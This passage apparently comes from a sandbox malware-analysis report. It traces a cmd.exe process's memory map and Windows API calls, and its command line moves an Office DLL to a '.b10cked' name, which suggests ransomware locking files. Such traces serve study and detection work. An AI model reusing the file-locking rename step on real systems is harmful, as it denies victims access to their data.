[0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22769 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22770 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22771 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22772 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 22773 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22774 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22775 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22776 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22777 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 22778 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22983 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22984 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22985 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22986 start_va = 0x150000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 22987 start_va = 0x3c0000 end_va = 0x4bffff entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 22988 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22989 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22990 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22991 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22992 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22993 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22994 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22995 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22996 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22997 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 22998 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22999 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 23000 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 23001 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 23002 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 23003 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 23004 start_va = 0x4c0000 end_va = 0x5c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 23005 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 23006 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Thread: id = 354 os_tid = 0x8cc [0169.515] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2af78c | out: lpSystemTimeAsFileTime=0x2af78c*(dwLowDateTime=0x9c1fee40, dwHighDateTime=0x1d440a9)) [0169.516] GetCurrentProcessId () returned 0x748 [0169.516] GetCurrentThreadId () returned 0x8cc [0169.516] GetTickCount () returned 0x3206b [0169.516] QueryPerformanceCounter (in: lpPerformanceCount=0x2af784 | out: lpPerformanceCount=0x2af784*=22630488450) returned 1 [0169.517] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0169.517] __set_app_type (_Type=0x1) [0169.517] __p__fmode () returned 0x76b331f4 [0169.517] __p__commode () returned 0x76b331fc [0169.517] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0169.517] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0169.518] GetCurrentThreadId () returned 0x8cc [0169.518] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x8cc) returned 0x38 [0169.518] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0169.518] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0169.518] SetThreadUILanguage (LangId=0x0) returned 0x409 [0169.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0169.518] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2af71c | out: phkResult=0x2af71c*=0x0) returned 0x2 [0169.518] VirtualQuery (in: lpAddress=0x2af753, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x2af000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x1b0000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x1b1000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x1b1000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x1b3000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x1b3000, AllocationBase=0x1b0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0169.519] VirtualQuery (in: lpAddress=0x2b0000, lpBuffer=0x2af6ec, dwLength=0x1c | out: lpBuffer=0x2af6ec*(BaseAddress=0x2b0000, AllocationBase=0x2b0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0169.519] GetConsoleOutputCP () returned 0x1b5 [0169.519] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0169.519] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0169.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.519] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0169.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.520] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0169.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0169.520] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0169.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.520] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0169.520] _get_osfhandle (_FileHandle=0) returned 0x3 [0169.520] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0169.521] GetEnvironmentStringsW () returned 0x3d0210* [0169.521] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0169.521] GetEnvironmentStringsW () returned 0x3d0210* [0169.521] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0169.521] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae68c | out: phkResult=0x2ae68c*=0x40) returned 0x0 [0169.521] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0xa0, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.522] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.522] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.522] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x0, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.524] RegCloseKey (hKey=0x40) returned 0x0 [0169.524] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ae68c | out: phkResult=0x2ae68c*=0x40) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x40, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x1, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.524] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x0, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.525] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x9, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.525] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x4, lpData=0x2ae698*=0x9, lpcbData=0x2ae690*=0x4) returned 0x0 [0169.525] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ae694, lpData=0x2ae698, lpcbData=0x2ae690*=0x1000 | out: lpType=0x2ae694*=0x0, lpData=0x2ae698*=0x9, lpcbData=0x2ae690*=0x1000) returned 0x2 [0169.525] RegCloseKey (hKey=0x40) returned 0x0 [0169.525] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886387 [0169.525] srand (_Seed=0x5b886387) [0169.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"" [0169.525] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\OMSINTL.DLL.trx_dll.b10cked\"" [0169.525] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.526] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3d1970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0169.526] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0169.526] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0169.526] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0169.526] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0169.526] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0169.526] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0169.526] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0169.526] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0169.526] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0169.526] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0169.526] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0169.526] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0169.527] GetEnvironmentStringsW () returned 0x3d2360* [0169.527] FreeEnvironmentStringsW (penv=0x3d2360) returned 1 [0169.527] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.527] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0169.527] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0169.527] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0169.527] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0169.527] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0169.527] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0169.527] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0169.527] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0169.527] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0169.527] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2af458 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.527] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2af458, lpFilePart=0x2af454 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2af454*="Desktop") returned 0x18 [0169.528] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0169.528] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2af1d4 | out: lpFindFileData=0x2af1d4) returned 0x3d09f0 [0169.528] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0169.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2af1d4 | out: lpFindFileData=0x2af1d4) returned 0x3d09f0 [0169.529] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0169.529] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2af1d4 | out: lpFindFileData=0x2af1d4) returned 0x3d09f0 [0169.529] FindClose (in: hFindFile=0x3d09f0 | out: hFindFile=0x3d09f0) returned 1 [0169.529] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0169.529] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0169.529] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0169.529] GetEnvironmentStringsW () returned 0x3d0210* [0169.530] FreeEnvironmentStringsW (penv=0x3d0210) returned 1 [0169.530] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0169.530] GetConsoleOutputCP () returned 0x1b5 [0169.612] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0169.612] GetUserDefaultLCID () returned 0x409 [0169.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0169.612] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2af598, cchData=128 | out: lpLCData="0") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2af598, cchData=128 | out: lpLCData="0") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2af598, cchData=128 | out: lpLCData="1") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0169.613] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0169.613] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0169.614] GetConsoleTitleW (in: lpConsoleTitle=0x3c0930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.614] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0169.614] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0169.614] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0169.615] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0169.615] _wcsicmp (_String1="move", _String2=")") returned 68 [0169.615] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0169.615] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0169.616] _wcsicmp (_String1="IF", _String2="move") returned -4 [0169.616] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0169.616] _wcsicmp (_String1="REM", _String2="move") returned 5 [0169.616] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0169.620] GetConsoleTitleW (in: lpConsoleTitle=0x2af290, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0169.620] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0169.620] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0169.620] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0169.620] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0169.620] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0169.620] _wcsicmp (_String1="move", _String2="CD") returned 10 [0169.620] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0169.620] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0169.620] _wcsicmp (_String1="move", _String2="REN") returned -5 [0169.620] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0169.620] _wcsicmp (_String1="move", _String2="SET") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0169.621] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0169.621] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0169.621] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0169.621] _wcsicmp (_String1="move", _String2="MD") returned 11 [0169.621] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0169.621] _wcsicmp (_String1="move", _String2="RD") returned -5 [0169.621] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0169.621] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0169.621] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0169.621] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0169.621] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0169.621] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0169.621] _wcsicmp (_String1="move", _String2="VER") returned -9 [0169.621] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0169.621] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0169.621] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0169.621] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0169.621] _wcsicmp (_String1="move", _String2="START") returned -6 [0169.621] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0169.621] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0169.621] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0169.623] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0169.623] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0169.623] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2af04c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2af044, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2af044*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0169.623] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0169.623] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0169.623] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0169.624] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0169.624] _wcsnicmp (_String1="COPYCMD", 